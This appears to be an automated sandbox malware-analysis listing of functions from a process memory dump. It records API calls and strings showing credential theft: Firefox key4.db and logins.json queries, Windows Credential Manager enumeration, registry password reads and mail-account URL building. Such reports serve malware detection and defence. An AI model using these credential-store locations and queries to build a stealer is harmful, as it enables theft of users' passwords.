                                          • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                          Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                          • LoadCursorA.USER32(00000067), ref: 0040115F
                                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                          • EndDialog.USER32(?,00000001), ref: 0040121A
                                          • DeleteObject.GDI32(?), ref: 00401226
                                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                          • ShowWindow.USER32(00000000), ref: 00401253
                                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                          • ShowWindow.USER32(00000000), ref: 00401262
                                          • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                          • memset.MSVCRT ref: 0040128E
                                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                          • String ID:
                                          • API String ID: 2998058495-0
                                          • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                          • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                          • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                          • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                          Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcmp$memcpy
                                          • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                          • API String ID: 231171946-2189169393
                                          • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                          • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                          • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                          • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                          Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                          • API String ID: 633282248-1996832678
                                          • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                          • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                          • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                          • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                          Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • key4.db, xrefs: 00406756
                                          • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                          • , xrefs: 00406834
                                          • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memcmp$memsetstrlen
                                          • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                          • API String ID: 3614188050-3983245814
                                          • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                          • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                          • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                          • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                          Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                          • API String ID: 710961058-601624466
                                          • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                          • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                          • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                          • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                          Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: sprintf$memset$_mbscpy
                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                          • API String ID: 3402215030-3842416460
                                          • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                          • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                          • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                          • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                          Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                            • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                            • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                            • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                            • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                            • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                          • strlen.MSVCRT ref: 0040F139
                                          • strlen.MSVCRT ref: 0040F147
                                          • memset.MSVCRT ref: 0040F187
                                          • strlen.MSVCRT ref: 0040F196
                                          • strlen.MSVCRT ref: 0040F1A4
                                          • memset.MSVCRT ref: 0040F1EA
                                          • strlen.MSVCRT ref: 0040F1F9
                                          • strlen.MSVCRT ref: 0040F207
                                          • _strcmpi.MSVCRT ref: 0040F2B2
                                          • _mbscpy.MSVCRT ref: 0040F2CD
                                          • _mbscpy.MSVCRT ref: 0040F30E
                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                          • String ID: logins.json$none$signons.sqlite$signons.txt
                                          • API String ID: 1613542760-3138536805
                                          • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                          • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                          • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                          • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                          Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                          • API String ID: 1012775001-1343505058
                                          • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                          • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                          • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                          • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                          Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00444612
                                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                          • strlen.MSVCRT ref: 0044462E
                                          • memset.MSVCRT ref: 00444668
                                          • memset.MSVCRT ref: 0044467C
                                          • memset.MSVCRT ref: 00444690
                                          • memset.MSVCRT ref: 004446B6
                                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                            • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                          • memcpy.MSVCRT ref: 004446ED
                                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                          • memcpy.MSVCRT ref: 00444729
                                          • memcpy.MSVCRT ref: 0044473B
                                          • _mbscpy.MSVCRT ref: 00444812
                                          • memcpy.MSVCRT ref: 00444843
                                          • memcpy.MSVCRT ref: 00444855
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpymemset$strlen$_mbscpy
                                          • String ID: salu
                                          • API String ID: 3691931180-4177317985
                                          • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                          • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                          • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                          • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                          Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                          • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$Library$FreeLoad
                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                          • API String ID: 2449869053-232097475
                                          • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                          • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                          • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                          • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                          Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • sprintf.MSVCRT ref: 0040957B
                                          • LoadMenuA.USER32(?,?), ref: 00409589
                                            • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                            • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                            • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                            • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                          • DestroyMenu.USER32(00000000), ref: 004095A7
                                          • sprintf.MSVCRT ref: 004095EB
                                          • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                          • memset.MSVCRT ref: 0040961C
                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                          • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                          • DestroyWindow.USER32(00000000), ref: 0040965C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                          • String ID: caption$dialog_%d$menu_%d
                                          • API String ID: 3259144588-3822380221
                                          • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                          • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                          • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                          • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                          Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$Library$FreeLoad
                                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                          • API String ID: 2449869053-4258758744
                                          • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                          • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                          • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                          • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                          Function 0040F802 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                          • memset.MSVCRT ref: 0040F84A
                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                          • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                          • LocalFree.KERNEL32(?), ref: 0040F92C
                                          • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                          • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                          • String ID: Creds$ps:password
                                          • API String ID: 551151806-1872227768
                                          • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                          • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                          • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                          • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                          Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • wcsstr.MSVCRT ref: 0040426A
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                          • _mbscpy.MSVCRT ref: 004042D5
                                          • _mbscpy.MSVCRT ref: 004042E8
                                          • strchr.MSVCRT ref: 004042F6
                                          • strlen.MSVCRT ref: 0040430A
                                          • sprintf.MSVCRT ref: 0040432B
                                          • strchr.MSVCRT ref: 0040433C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                          • String ID: %s@gmail.com$www.google.com
                                          • API String ID: 3866421160-4070641962
                                          • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                          • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                          • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                          • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                          Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • _mbscpy.MSVCRT ref: 00409749
                                          • _mbscpy.MSVCRT ref: 00409759
                                            • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                            • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                            • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                          • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                          • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                          • _mbscpy.MSVCRT ref: 004097A1
                                          • memset.MSVCRT ref: 004097BD
                                          • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                          • String ID: TranslatorName$TranslatorURL$general$strings
                                          • API String ID: 1035899707-3647959541
                                          • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                          • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                          • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                          • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                          Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                          • API String ID: 2360744853-2229823034
                                          • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                          • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                          • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                          • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                          Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • strchr.MSVCRT ref: 004100E4
                                          • _mbscpy.MSVCRT ref: 004100F2
                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                            • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                          • _mbscpy.MSVCRT ref: 00410142
                                          • _mbscat.MSVCRT ref: 0041014D
                                          • memset.MSVCRT ref: 00410129
                                            • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                            • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                          • memset.MSVCRT ref: 00410171
                                          • memcpy.MSVCRT ref: 0041018C
                                          • _mbscat.MSVCRT ref: 00410197
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                          • String ID: \systemroot
                                          • API String ID: 912701516-1821301763
                                          • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                          • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                          • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                          • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                          Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$strlen
                                          • String ID: -journal$-wal$immutable$nolock
                                          • API String ID: 2619041689-3408036318
                                          • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                          • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                          • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                          • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                          Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
